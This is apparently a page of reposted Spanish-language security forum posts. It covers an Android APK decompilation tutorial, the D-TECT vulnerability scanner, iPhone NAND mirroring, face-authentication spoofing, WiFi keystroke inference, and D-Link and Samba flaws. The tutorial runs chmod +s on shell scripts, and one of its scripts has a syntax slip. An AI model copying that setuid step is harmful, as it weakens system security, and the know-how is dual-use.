Cita de: redeszone.net"El curso que imparte la Linux Foundation se titula "Fundamentos de Administración de Sistemas Linux" y se le conoce como LFS201. Este curso es 100% online y tiene una duración aproximada de entre 40 y 50 horas. Durante el mismo se imparten al usuario los conocimientos necesarios para saber lo básico sobre la administración de servidores Linux y se le prepara para poder obtener la certificación correspondiente como administrador de sistemas."





Acceso al curso: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Temario del curso en español: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Apuntes de apoyo para el curso: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta





Un saludo, HATI  ;D
#92
Android / Cómo sacar el código de un apk - By Bad Daemons
Septiembre 19, 2016, 10:32:23 AM




Una de las cosas buenas que tienen las aplicaciones para android, es que permiten que se examine el código fuente, sin que la licencia que tiene importe demasiado. Evidentemente, de hacerlo y querer modificarlas, no se podrian distribuir (supuestamente), ya que esto iria, de ser privativas, en contra del copyright. Es posible que ni siquiera sea legal examinarlo, ya se sabe cómo son con estas cosas. Pero cómo no pueden evitarlo, al lío.

Las órdenes estarán pensadas para usar en Ubuntu 16.04. "Oh dios mío, Ubuntu, que te ha pasado, tu antes molabas." La vida. El motivo de usarla es que encontré la manera de hacerlo apuntando a Ubuntu concretamente, y dado que lo he hecho usando docker, me da bastante igual la distribución. En teoria deberia ir con cualquier distro, adaptando los paquetes a cómo se llamen en esa. Por cierto, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta está el link al repositorio git en el que tengo el Dockerfile para poder construir esa imagen. Si os da igual el cómo, podéis seguir el README y en 10 minutos estar descompilando apk. Para las que tienen curiosidad en la vida, ahí va.

Desde el propio Ubuntu, primero de todo actualizar e instalar todos los paquetes que seran necesarios. Es posible que varios ya lo estén:

Código: text
su -c "apt-get update; apt-get install  --no-install-recommends ca-certificates net-tools openssh-server unzip openjdk-8-jdk mercurial gradle patch wget"



Ahora, se descargaran dos herramientas básicas para darle al tema. La primera, dex2jar. Se descarga, descomprime, enlace simbolico y permisos de ejecución.

Código: text
cd ~/
wget https://sourceforge.net/projects/dex2jar/files/dex2jar-2.0.zip/download -O dex2jar.zip
unzip dex2jar.zip
rm dex2jar.zip



Ahí va la primera. Esta herramienta lo que hace es pasar del formato .dex, que es lo que usa la máquina virtual java de Android (Dalvik) y lo pasa a un formato jar, lo que permite que se ejecute o se manipule con openjdk.

La segunda herramienta es procyon (luego me quejo de los nombres de mis programas), que es un conjunto de herramientas de metaprogramación (su definición). Tiene un montón de cosas que nos dan muy igual, sólo nos interesa una de ellas, el decompiler. Ahora se clona el repositorio.

Código: text

cd ~/
hg clone https://bitbucket.org/mstrobel/procyon
cd procyon



Un pequeño parón aquí. Hay que quitar todas las líneas en las que salga "sign" del archivo build.gradle. Lo podéis hacer a mano o podéis guardar el siguiente bloque de código con el nombre de parche en el directorio procyon y aplicarlo con patch < parche en el directorio del programa.

Código: text
diff -r 1aa0bd29339b build.gradle
a/build.gradle      Sat May 21 11:20:43 2016 -0400
b/build.gradle      Tue May 31 12:11:49 2016 +0000
@@ -59,7 +59,6 @@

subprojects {
     apply plugin: 'maven'
-    apply plugin: 'signing'

     archivesBaseName = 'procyon-' + it.name.split("\\.")[1].toLowerCase()

@@ -91,10 +90,6 @@
             archives sourcesJar
         }

-        signing {
-            sign configurations.archives
-        }
-
         uploadArchives {
             repositories.mavenDeployer {
                 beforeDeployment { MavenDeployment deployment ->



Solo queda compilar el programa. Puede que de algún warning, es un poco quejica. Pero si no es más que eso, deberia funcionar correctamente:

Código: text
gradle fatJar



Y con esto, ya podemos empezar a descompilar apk. El proceso viene a ser, pasar los .dex a .jar y descompilarlo sin más. Las órdenes serian:

Código: text
# aquí tenemos el apk, por ejemplo
cd ~/apk
mv com.ejemplo.apk com.ejemplo.apk.zip
unzip com.ejemplo.apk.zip
dex2jar classes.dex
mkdir ~/src
java -jar ~/procyon/build/Procyon.Decompiler/libs/procyon-decompiler-0.5.32.jar -jar classes-dex2jar.jar -o ~/src



Y con esto ya esta. Es bastante sencillo. Pero un poco coñazo, sobretodo si se piensa que esto no se hace de manera habitual (yo no tengo por costumbre descomprimir apk). Si se hace muy de vez en cuando, cada vez que se haga habra que remirar este articulo, o unos apuntes o lo que sea. Por ello, vamos a dejarlo bonico der to con un par de enlaces simbolicos y algunos scripts.

Código: text
ln -s ~/dex2jar-2.0/d2j-dex2jar.sh /usr/local/bin/dex2jar
chmod +s ~/dex2jar-2.0/d2j-dex2jar.sh ~/dex2jar-2.0/d2j_invoke.sh



El siguiente script, se meterá en /usr/local/bin/decompiler y se le dará permisos de ejecución con chmod +x /usr/local/bin/decompiler. Aviso: hay que tener en cuenta que en ambos scripts se da por supuesto que los programas están en la raiz de /home/$USER. Si no está ahí, deberia adaptarse.

Código: text
#!/bin/bash

if [ -z "$1" ] || [ -z "$2"]
then
    echo "You need to pass the apk path and the output pasth as an argument. Exiting..."
    exit
fi

java -jar ~/procyon/build/Procyon.Decompiler/libs/procyon-decompiler-0.5.32.jar -jar "$1" -o "$2"



Lo mismo con el siguiente, pero con el nombre de /usr/local/bin/automatic-decompile y se le dará permisos de ejecución con chmod +x /usr/local/bin/automatic-decompile. Este nombre no tiene por que ser así, pero el anterior si que debe llamarse decompiler, ya que está hardcodeado en el siguiente.

Código: text
#!/bin/bash

if [ -z "$1" ]
then
    echo "You need to pass the apk path as an argument. Exiting..."
    exit
fi

mkdir -p ~/tmp/"$1"
cp "$1" ~/tmp/"$1"/"$1".zip
cd ~/tmp/"$1"/

echo "Unziping apk..."
unzip "$1".zip > /dev/null

echo "Executing dex2jar..."
dex2jar classes.dex 2> /dev/null

echo "Decompiling jar..."
mkdir -p ~/src/"$1"
decompiler classes-dex2jar.jar ~/src/"$1" > /dev/null
echo "Done. The source code is under ~/src/$1/. You can delete ~/tmp."



Y ale. De este modo, para descomprimir un apk sólo habrá que ejecutar:

Código: text
automatic-decompile /ruta/al/apk



Entonces, se crearán dos directorios, ~/tmp/ ~/src/. El código estará disponible en el segundo, el primero, cómo su nombre indica, se podrá borrar. Más sencillo de recordar entre uso y uso, creo yo.





Autor: Bad Daemons
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#93

Que un sistema operativo sea seguro y no pueda ser posible saltarse las pantallas de bloqueo es muy importante a la hora de proteger nuestros datos más sensibles, sin embargo, puede ser un grave problema cuando hay investigaciones policiales de por medio. Una de las últimas veces que se ha hablado de esto fue tras el tiroteo de San Bernardino, en Estados Unidos, cuando el FBI comenzó a intentar desbloquear el iPhone del tirador para poder conseguir más información sobre su personalidad.

Una de las principales características de iOS es su seguridad. Todos los datos que se guardan en los dispositivos están cifrados, cada uno con una clave única e imposible de conseguir, y la pantalla de bloqueo es tan restrictiva que hace imposible saltarse su protección y desbloquear el dispositivo sin el correspondiente código de acceso.

Varios investigadores de seguridad recomendaron al FBI utilizar una técnica conocida como "NAND mirroring", un clonado de la memoria NAND del dispositivo tantas veces como la compañía quisiera de manera que, mediante fuerza bruta, se pudieran probar todos los códigos de acceso posibles hasta dar con el correcto. Al poco de empezar a recibir dichas sugerencias, el director del FBI aseguró que esa técnica no funcionaba y que iban a buscar la forma de romper la seguridad desde una empresa privada del sector.



La técnica rechazada por el FBI para hackear el iPhone es totalmente funcional, lo que pasa es que no la probaron

Sergei Skorobogatov, un investigador de seguridad de la Universidad de Cambridge, en el Reino Unido, ha demostrado cómo ha sido capaz de clonar varias veces los datos de la memoria NAND de un iPhone 5c con iOS 9.3. Tras tener la NAND clonada, el investigador ha utilizado un programa de fuerza bruta para averiguar la contraseña, hasta dar con ella. Es cierto que el proceso es lento (un código de 4 dígitos tardará en torno a 20 horas, mientras que uno de 6 dígitos podría tardar hasta 3 meses), pero es totalmente funcional.

Este investigador de seguridad ha probado que es posible utilizar esta técnica en los iPhone 5c y 6 al utilizar el mismo modelo de NAND, sin embargo, aunque otros smartphones utilicen modelos diferentes, es muy fácil adaptar la técnica para que funcione en ellos.



El investigador de seguridad ha No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con el fin de que otros puedan conocerla e incluso permitir al FBI tomar nota para otras ocasiones, e incluso permitir a Apple que investigue el suceso e intente solucionar dicho fallo en los nuevos modelos de iPhone.

Finalmente, como suele ocurrir con las organizaciones gubernamentales, el FBI pagó un millón de dólares de los contribuyentes a una empresa privada para que esta desbloqueara el dispositivo. De haber hecho caso a los investigadores de seguridad, el proceso podría haberse logrado invirtiendo solo unos pocos de cientos de dólares.

Investigación: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (en inglés)



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#94

Hemos hablado en varias ocasiones sobre diferentes sistemas que tratan de acabar con el uso de las contraseñas, y es que raro es el día que no se conoce una nueva amenaza que trata de robarnos los datos de acceso a nuestras cuentas o que se produzca algún ataque sobre un servicio que acabe con el robo de millones de cuentas que son publicadas o puestas a la venta en la web oscura.

Pues bien, ahora acabamos de conocer un nuevo sistema que pretende enterrar de una vez por todas el uso de contraseñas y que está diseñado para aprender de los hábitos del usuario y crear un patrón de comportamiento para saber si la persona que está haciendo uso del móvil es el propietario o no.



Este curioso sistema ha sido bautizado con el nombre de UnifyID y en lugar de hacer uso de las habituales contraseñas, lo que hace es comenzar a construir un patrón del usuario a partir de los dispositivos que utiliza, lo lugares que frecuenta, la cadencia a la hora de pulsar el teclado, los sitios web que visita e incluso la forma de caminar, gracias a sensores con los que cuentan hoy nuestros smartphones.

Una vez que UnifyID estudie todo el comportamiento del usuario, comienza a construir un perfil del mismo y puede calcular una puntuación basada en la probabilidad de que eres tú y así no tengas que hacer uso de la contraseña de acceso a tus cuentas y seas identificado automáticamente.  Este innovador sistema se va a poner a prueba en una primera fase beta privada esta misma semana en dispositivos iOS, aunque la aplicación para Android llegaría posteriormente.

Para comenzar a probar UnifyID es necesario instalar un complemento en el navegador Chrome y la aplicación móvil diseñada para aprender sobre el comportamiento de cada usuario. Una vez esté todo en el dispositivo, comenzará a registrar los sitios webs que se visitan, la forma y cadencia de teclear, movimientos característicos captados por los diferentes sensores del dispositivos, etc.

Hasta que el sistema sea capaz de reconocer completamente al usuario es probable que le solicite, por ejemplo, identificarse a través del sensor de huellas, pero el objetivo final es que pueda saber si somos nosotros los que estamos al otro lado del terminal y ofrecernos el acceso a nuestras cuentas sin hacer uso de las contraseñas.

Página oficial:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#95
Hacking / OpenStego - Herramienta de esteganografía
Septiembre 06, 2016, 07:46:29 AM
OpenStego


OpenStego es un software de código abierto distribuido bajo los términos de la Licencia Pública General de GNU versión 2.0.

OpenStego proporciona dos funciones principales:

       ⦁   Ocultación de datos: puede ocultar cualquier dato dentro de un archivo portador (por ejemplo, imágenes).

       ⦁   Marcas de agua (beta): permite añadir marcas de agua a archivos (por ejemplo, imágenes) con una firma invisible. Puede ser utilizado para detectar la copia de archivos no autorizada.



¿Qué es la esteganografía?

La esteganografía es la ciencia de ocultar mensajes secretos dentro de otro mensaje más grande e "inofensivo".  Está en una categoría por encima de la criptografía regular; la cual acaba de esconder  el mensaje original. La esteganografía intenta ocultar el hecho de que hay un mensaje escondido.  Los mensajes tratados con esta técnica a menudo parecen ser algo más que el mensaje original, como una imagen, sonido, texto más grande, etc.


Algunos de los términos relacionados con la esteganografía:

       ⦁   Texto plano (plaintext):  el mensaje secreto original que necesita ser comunicado.

       ⦁   Texto cifrado (ciphertex): el mensaje secreto es a menudo cifrado utilizando métodos tradicionales en primer lugar. Al mensaje cifrado se le conoce como texto cifrado.

       ⦁   Portador (covertext): conjunto de datos o archivo grande e inofensivo que se utiliza como contenedor para el texto plano/texto cifrado. Puede ser una imagen, sonido, texto, etc.

       ⦁   Estego-mensaje  (stegotext):  conjunto de datos generados después de la incorporación del texto plano/texto cifrado en el portador.


El procedimiento normal es primero encriptar el texto plano para generar el texto cifrado, y luego modificar el portador de alguna manera para contener el texto cifrado. El estego-mensaje  generado se envía al destinatario previsto. Si un tercero consigue el estego-mensaje  en el medio de la comunicación, entonces solo verá alguna imagen de aspecto inofensivo (o sonido, etc). Una vez que el destinatario recibe estego-mensaje, el texto cifrado se extrae de él mediante la inversión de la lógica que se utilizó para incrustarlo en primer lugar. El texto cifrado se descifra utilizando la criptografía tradicional para recuperar el texto claro original.



¿Qué es la marca de agua digital?

Es el proceso de incorporación de una marca en archivos que lo permiten, tales como imágenes. Por lo general se utiliza para identificar la propiedad de los derechos de autor. La información oculta debe, aunque no necesariamente, tener relación con el archivo marcado. Las marcas de agua digitales pueden ser utilizadas para verificar la autenticidad o la integridad del archivo, o para mostrar la identidad de sus propietarios. Se utiliza principalmente para el seguimiento de las infracciones de derechos de autor y para la autenticación de billetes. Al igual que las marcas de agua tradicionales, las marcas de agua digitales son solamente perceptibles bajo ciertas condiciones, es decir, después de usar algún algoritmo, y son imperceptibles en cualquier otro momento. Si una marca de agua digital distorsiona el archivo marcado de una manera que se hace perceptible, no es de ninguna utilidad.

OpenStego ofrece sólidas capacidades de marcas de agua digitales de tal manera que la marca de agua no se distorsiona facilmente cuando se redimensiona la imagen, se recorta o se realizan algunas pequeñas modificaciones.




Usar OpenStego:

Usar OpenStego es bastante sencillo. Hay dos modos de funcionamiento (ocultación de datos y marcas de agua).


       ⦁   Ocultación de datos: este modo permite ocultar datos (archivo) dentro de una imagen, o extraer los datos de la imagen. A continuación se muestran capturas de pantalla para ver cómo se realiza correctamente:

Ocultación de datos:

Extracción de datos:


       ⦁   Marcas de agua (beta): este modo permite  realizar una marca de agua o verificar las imágenes con su firma. Lo primero que necesitas es generar un archivo de firma, y posteriormente este se utiliza para marcar imágenes o verificar las mismas . Compruebe  las capturas de pantalla a continuación para ver cómo se realiza correctamente:

Generar firma:


Incorporar la marca de agua:


Verificar la marca de agua:



También es posible usar OpenStego mediante comandos de la terminal.
Información sobre la sintáxis general: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (en inglés)





Fuente oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (en inglés)
Autor: Samir Vaidya
Github: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Un saludo, HATI   ;D
#96




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta






#97
Hacking / D-TECT - Pentesting the Modern Web
Septiembre 01, 2016, 07:59:32 AM

D-TECT es una la herramienta todo-en-uno para pruebas de penetración. Está especialmente programado para hacer más fácil el trabajo de pentesters e investigadores de seguridad informática. En lugar de utilizar diferentes herramientas para realizar diferentes tareas, D-TECT ofrece múltiples características y funciones de recolección de información para encontrar vulnerabilidades en un objetivo.


Compatibilidad:

⦁    Cualquier plataforma usando Python 2.7


Requisitos:

⦁   Python 2.7
⦁   Módulos (incluidos) : Colorama , BeautifulSoup


Características:

⦁       Escaner de subdominios
⦁       Exploración de puertos
⦁       Escaner de Wordpress
⦁       Enumeración de usuarios de Wordpress
⦁       Banner Grabbing
⦁       Detección de archivos sensibles
⦁       Escaner Same-Site Scripting
⦁       Detección Click Jacking
⦁       Poderoso escaner de vulnerabilidades XSS
⦁       Escaner de vulnerabilidades de SQL Injecction
⦁       Interfaz de usuario amigable


Uso:
Código: text
python d-tect.py



Capturas de pantalla:

Banner Grabbing:



Detección Click Jacking:



Escaner de puertos:



WordPress Backup Grabber:



Detección de archivos sensibles:



Escaner Cross-Site Scripting [ XSS ]:



Escaner SQL Injection [ SQLI ]:



Escaner de subdominios:



Enumeración de usuarios de Wordpress:



Detección de Same Site Scripting:



Link de descarga:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: Shawar Khan
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (en inglés)


Un saludo, HATI   ;D
#98



Los sistemas de autenticación de cara se han hecho "más inteligentes", pero siempre han tenido muchos problemas que permiten engañarlos con imágenes y fotografías 2D. Ahora, investigadores de seguridad de la Universidad de Carolina del Norte descubrieron que con modelos 3D de rostros de fotos tomada de Facebook se pueden saltear la mayoría de estos sistemas de autenticación. Incluso han logrado el 100% tasa de éxito si las fotos eran tomadas en el interior.

Google y otros fabricantes de sistemas de autenticación de cara, han mejorando estos sistemas por lo que ya no es tan fácil eludirlos con fotos y por eso los investigadores utilizaron métodos de reconstrucción de rostro 3D utilizado distinta disposiciones de fotos y con diferentes niveles de iluminación. Los resultados fueron expuestos en la conferencia Usenix Security 16 en el paper "Virtual U: Defeating Face Liveness Detection by Building Virtual Models from Your Public Photos".

Después, para construir la cara virtual utilizaron sistemas de VR para engañar la detección de "vitalidad" del sistema de autenticación. Con esto, la cara se puede "mover" de la misma forma que lo hacen los seres humanos. El hecho de que un mundo virtual se pueda reproducir tanto como sea posible, simplemente es cuestión de esfuerzos y recursos de hardware, lo cual hace bastante difícil la defensa contra este tipo de ataque.



Los investigadores dijeron que podría haber tres tipos de tecnologías que podrían hacer más difícil este tipo de ataque basado en realidad virtual: usar proyección aleatoria de patrones de luz; detectar las fluctuaciones del tono de piel, relacionados con pulso y; utilizar sensores de luz infrarroja.

Los investigadores dijeron que "la autenticación de cara puede ser la forma más débil de autenticación biométrica disponible actualmente". En orden ascendente de fuerza, la autenticación de cara sería seguido por la autenticación de iris (que también puede extraerse de las fotos), la autenticación por voz y la autenticación de huella digital.

Aunque los sistemas más viejos de autenticación de huella digital podrían evitarse con imágenes fijas o moldes, los nuevos sistemas han conseguido ser más inteligentes y además, es mucho más difícil conseguir una foto de alta resolución de las impresiones dactilares de una persona.



Fuente:blog.segu-info.com.ar
#99
En la última década se ha empezado a vulnerar la privacidad de los usuarios debido a la gran cantidad de información que tiene nuestro teléfono sobre nosotros, y a la supuesta información que recogen sin nosotros darnos cuenta, a través del micrófono, cámara o el teclado. Ahora, todas estas fuentes de información van a ser accesibles desde una única API.


Este nuevo sistema ha sido creado por el World Wide Web Consortium (W3C), bajo el nombre de Proximity Sensor API. Este sistema permitirá a las páginas webs, aplicaciones y sitios de anuncios conocer cuál es la posición de los objetos que tenemos alrededor de nuestro teléfono para también posicionarnos a nosotros.

Nuestros teléfonos están cargados de sensores. Juntando la información que recogen las cámaras trasera y delantera, los sensores de movimiento, los acelerómetros, o sensores de proximidad, se puede hacer un mapeo que permita al teléfono saber en qué parte de la habitación se encuentra el usuario, y también dónde se encuentran las puertas, paredes o ventanas. También podrían identificar determinados objetos que se encuentren en nuestro hogar, como una televisión, una consola, un teclado, etcétera.

Esta nueva API plantea una grave violación de privacidad. Cualquier atacante puede usar código malicioso e implantarlo en una web que solicite esos datos sobre nosotros. Entre la información que se puede adquirir con este método se encuentra cómo usa el usuario el dispositivo, la frecuencia con la que desbloquea la pantalla, el tiempo que lo usa, cuánto tiempo lo usa en sus diferentes posiciones, qué partes de la pantalla toca más, e incluso a qué distancia de la cara lo utiliza y a qué altura del suelo.


Si esta API no requiriera de permisos, sería a efectos prácticos un malware que podría acceder a toda esta información. Si este sistema acaba implementándose, requerirá de una gestión efectiva de los permisos, con el fin de conocer a qué partes de nuestro teléfono tiene acceso.

Además, en el caso de que aceptemos que se recopilen esos datos, deberíamos conocer en todo momento qué webs los solicitan, y qué datos están siendo obtenidos. Esto ha sido incluido en la última versión de la API, en la que se ha incorporado la gestión de permisos desde el navegador. La API sigue todavía en desarrollo, y no sería raro que la viéramos incluida en navegadores e incluso en sistemas operativos móviles.


Fuente:adslzone.net
#100


Os vamos a hablar de un nuevo ataque por medio del cual se podrían ver comprometidas todas nuestras contraseñas y demás datos personales introducidos mediante el teclado, todo ello a través de señal WiFi que utilizamos habitualmente.

Esto es algo que recientemente ha sido demostrado por varios científicos, y es que estos han afirmado que es posible detectar con mucha precisión las pulsaciones que un usuario realiza sobre su teclado tan solo utilizando las señales WiFi de un router convencional. Esto ha sido descubierto por una serie de científicos de la Universidad Estatal de Michigan y la Universidad de Nanjing en China.

De este modo han podido demostrar que si nos encontramos en entornos con interferencias mínimas de la señal, un atacante podría usar las interrupciones que se producen en la WiFi de nuestro router para detectar las teclas que vamos presionando en nuestro ordenador portátil. Aunque en un principio todo esto pueda sonar a ciencia ficción, lo cierto es que es más real de lo que podríamos pensar, ya se ha experimentado anteriormente con tecnologías que demuestran que por medio de las señales WiFi se puede detectar la presencia y movimientos de una persona dentro de una habitación.

Del mismo modo esta mismas señales también se han utilizado para leer los gestos que llevamos a cabo con las manos y los movimientos de los labios, es decir, que la precisión de las las mismas ya está más que aceptada por los investigadores. El experimento actual basado en las pulsaciones de teclado se ha denominado WiKey, y para el mismo los investigadores usaron un router TP-Link TL-WR1043ND WiFi y un ordenador portátil Lenovo X200.

Pues bien, con el fin de recoger los pequeños cambios en las señales WiFi, se utilizó la tecnología MIMO del router (Multiple-Input y Multiple-Output), que se refiere al conjunto de funciones que permiten a cada una de las antenas enviar múltiples señales WiFi en el mismo canal de radio. Entonces estos investigadores usaron estas a modo de escáner y barrieron la habitación para crear un mapa del entorno. Debido a esto, WiKey sólo funciona en las habitaciones con un mínimo movimiento y con poca o ninguna presencia humana.

Una vez en este ambiente, WiKey utiliza los diminutos cambios en las señales inalámbricas del router para detectar las pulsaciones que hagamos en las teclas. Es decir, cuando una persona se encuentra en el portátil y comienza a escribir, WiKey es capaz de recoger las interrupciones en estas señales causadas por el pequeño cambio de manos, dedos e incluso las mismas teclas. Afirman que pulsando una determinada tecla, las manos y los dedos del usuario se mueven en una formación y dirección única, por lo que es posible generar un patrón. De este modo el equipo dice que mediante la formación de un algoritmo informático especial, el programa sería capaz de detectar qué teclas se han pulsado y recuperar el texto introducido, todo ello con una precisión que varía entre el 77% y el 97,5%.



Fuente:adslzone.net
#101


Cientos de miles de dispositivos D-Link son accesibles desde Internet debido a una vulnerabilidad que permitiría a un atacante remoto alterar las credenciales de administrador y a partir de ahí controlar los dispositivos, estamos hablando de camaras, routers, access points, NAS...

La empresa de seguridad informática No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, ha seguido la pista a una vulnerabilidad publicada hace unas semanas que afectaba a la cámara de red DCS-930L de D-link descubriendo que el alcance de la misma es muchísimo mayor del inicialmente supuesto. Partiendo de la base del aprovechamiento de software por una misma empresa en diversos modelos se ha descubierto que más de 120 dispositivos de D-Link son igualmente vulnerables.

Utilizando la plataforma No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se han detectado cerca de 400.000 dispositivos conectados a Internet y que son potenciales víctimas de un ataque remoto a través de esta vulnerabilidad, para la que recordamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ya ha lanzado algunas actualizaciones de firmware, mientras que otras se esperan para los próximos días.

El ataque, aprovechando un defecto en el servicio que procesa comandos remotos, permitiría a un atacante remoto enviar un comando con código insertado generando un desbordamiento de pila. Esto a su vez nos permitiría sobreescribir la contraseña de administrador o simplemente crear un nuevo usuario administrador y tomar control del dispositivo.

Aunque como decíamos ya existen algunas actualizaciones para esta vulnerabilidad, el porcentaje de dispositivos asegurados probablemente sea mínimo. Ya que en muchas ocasiones estos dispositivos se conectan y el tema de su seguridad, actualizaciones de firmware,etc... es algo que se ignora completamente durante toda la vida útil del producto.

Siempre hemos de tener en cuenta que cualquier dispositivo que se conecte a nuestra red o a Internet puede ser vulnerable y un posible objetivo de un atacante remoto, por lo que siempre hemos de estar atentos a mantener el software y firmware de nuestros dispositivos a la última, para de esta manera reducir las posibles vulnerabilidades que puedan presentar. A la vez siempre hay que reflexionar sobre hasta qué punto necesitamos tener estos dispositivos "mirando" a Internet ya que tarde o temprano se convertirán muy posiblemente en la puerta de entrada de un ataque informático, reduciendo estos posibles puntos de entrada aumentamos la seguridad de nuestra red.



Fuente:cyberseguridad.net
#102


Samba es el popular software gratuitos que permite acceder y utilizar los recursos compartidos en una red local, estos recursos compartidos pueden ser tanto archivos y carpetas como impresoras que están situadas en la red local de la organización. Samba está soportado por todos los sistemas operativos como Microsoft Windows, Linux y macOS entre otros muchos ya que es uno de los software más utilizados.

Ahora se ha descubierto una vulnerabilidad en las versiones Samba desde la 4.0.0 hasta la versión Samba 4.4.4, esta vulnerabilidad descubiertas recientemente podría permitir a un atacante desactivar el requisito de firma del cliente sobre SMB 2 y SMB 3. Esta nueva vulnerabilidad es catalogada como grave, y su identificador es CVE-2016-2119.

El problema de la vulnerabilidad CVE-2016-2119 es que podría permitir a un atacante quitar el requisito de firmado para una conexión de cliente SMB2 y SMB3, de esta forma, mediante un ataque MITM (Man In The Middle) y la inyección de los siguientes flags:


  •     SMB2_SESSION_FLAG_IS_GUEST
  •     SMB2_SESSION_FLAG_IS_NULL

Se podría permitir a un atacante suplantar el servidor mediante una conexión Samba y devolver contenido malicioso al ordenador remoto.


Ya hay disponible parches para Samba 4, actualiza cuanto antes

Actualmente el equipo de desarrollo de Samba 4 ha publicado las versiones Samba 4.4.5, 4.3.11 y 4.2.14 que corrige este fallo de seguridad. En el caso de que no puedas actualizar pronto, es recomendable configurar la siguiente directiva de manera temporal y como contramedida:

    "client ipc max protocol = NT1"

Si además "client signing" está configurado como "mandatory"/"required", hay que eliminar una configuración explicita de "client max protocol", que por defecto tiene "NT1".

En la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta tenéis todos los detalles sobre esta vulnerabilidad y el enlace directo a las nuevas versiones que solucionan estos problemas. En la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta encontraréis las última versiones de Samba y un historial de todos los cambios realizados en el software.



Fuente:redeszone.net
#103
Saludos a todos

Me recomendaron esta página de un profesor de la Universidad Complutense de Madrid. Hay numerosos problemas y tiene la opción de corregirlos en línea. Me pareció interesante compartirla.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#104
Anteayer os comentábamos que Kim Dotcom había anunciado que va a lanzar un nuevo sistema de almacenamiento en la nube, con muchas ventajas con respecto al Megaupload original, y sobre todo con el MEGA actual, del que Kit Dotcom dejó de formar parte el año pasado. Después de estar dando ciertas pistas en su cuenta de Twitter, finalmente ha confirmado toda la información sobre su nuevo servicio de almacenamiento en la nube.

El nuevo servicio de almacenamiento se llamará Megaupload, y contará con los datos de las cuentas de los usuarios original. Es decir, si teníais una cuenta premium en aquel entonces, os devolverán todo el tiempo restante que teníais en ella. Esto afectará a los 100 millones de usuarios que tenía la red cuando fue cerrada.


CitarSurprise: Most Megaupload accounts will be reinstated with Premium privileges on the new Megaupload. 100m users on day 1. Expect an email :)
Twitter - @KimDotcom

Con respecto al nombre, hace dos días el magnate multimedia daba a entender que el servicio volvería con un nombre familiar, y finalmente se ha desvelado que el nombre será Megaupload, pues se puede comprobar en whois que Kim Dotcom ha adquirido de nuevo el dominio de Megaupload, con base en Hong Kong.

Además, Kim hace un llamamiento a los desarrolladores que trabajaron en Megaupload, y a los que trabajen en MEGA, supuestamente para hacerles una suculenta oferta de trabajo.

CitarLet's make Megaupload great again
#105
Microsoft siempre ha mostrado interés en la utilización del ADN como medio de almacenamiento de información. Durante los últimos meses ha estado trabajando para conseguirlo y parece que tiene algo importante que compartir con nosotros. Según hemos podido saber, la firma de Redmond ha almacenado satisfactoriamente 200 megas de información y datos en ADN, lo que supone un nuevo récord mundial.


A finales de abril os contábamos que Microsoft había comprado diez millones de hebras de ADN para experimentar con el uso de este "material" como material de almacenamiento de información. La densidad de la información que puede guardar el ADN es muy superior a la de los sistemas tradicionales con una capacidad de 1 zettabyte (1.000.000.000 TB) en un gramo. Además, su resistencia al paso del tiempo es muy alta y puede almacenar la información durante cientos de años.

os problemas llegan a la hora de escribir y leer la información almacenada en ADN. La primera parte, es decir, la escritura, parece algo superado con el equipamiento desarrollado por la startup Twist Bioscience que genera las cadenas de ADN. Microsoft se ha aliado con este compañía en su afán por dominar este tipo de almacenamiento. La lectura es más complicada al utilizar el caro proceso de secuenciación.


Microsoft consigue almacenar 200 megas en ADN

La última noticia al respecto pasa por el nuevo récord logrado por la compañía de Redmond al conseguir almacenar 200 megas de datos en ADN. Para ello, ha colaborado estrechamente con la Universidad de Washington. Concretamente, Microsoft ha almacenado un vídeo musical en alta definición de OK Go y 100 de los libros que forman parte del Proyecto Gutenberg.

Esos 200 megas ocupan una pequeñísima porción de espacio y según el responsable del proyecto, no más grande que la punta de un lápiz. Con ello nos podemos hacer una idea más precisa. Microsoft quiere reducir el espacio necesario para almacenar cientos de miles de gigas y comprimirlo al tamaño de un terrón de azúcar.

Por eso, crece el interés en este ambicioso proyecto del gigante de Redmond que se une al temor sobre el complicado futuro de los sistemas actuales de almacenamiento.  Se teme que estos no sean suficientes. Por ello, el ADN con su capacidad para almacenar 1.000.000.000 TB) en un gramo, se presente como la mejor solución a la vista.



Fuente:adslzone.net
#106
Estados Unidos y la Unión Europea llevan años intentando acercar legislaciones en pos de un futuro tratado de comercio internacional. A pesar de que ambos gobiernos están por la labor, es complicado homogeneizar legislaciones que, en algunos casos, son tan dispares que no se puede alcanzar un acuerdo sin que una de las partes acabe perjudicada.

En el marco de estas negociaciones, los gobiernos europeos han dado luz verde a una legislación que será aprobada por el Parlamento Europeo la próxima semana. Esta legislación permitirá que las empresas privadas americanas puedan acceder a los datos de los ciudadanos europeos de manera más segura para los ciudadanos europeos, frente a la anterior e insegura legislación de 2015.


El objetivo principal de este acuerdo es ayudar a empresas que actúan en ambos países a poder unificar sus redes de datos, y poder transferirlos más fácilmente. Empresas como Google, Facebook o Mastercard llevaban casi un año en un limbo administrativo debido a que la Unión Europea tumbó la anterior legislación debido a que temían que los Estados Unidos pudieran acceder irrumpir espiando a los ciudadanos, incumpliendo la Ley de Protección de Datos europea.

Hoy se ha aprobado un nuevo marco para que estas transacciones de datos transatlánticos sean más seguras. El anterior acuerdo se llamaba Safe Harbour, y el nuevo pasará a llamarse Privacy Shield. Con ello, se espera que los datos de los ciudadanos europeos estén protegidos cuando sean traspasados a servidores americanos.


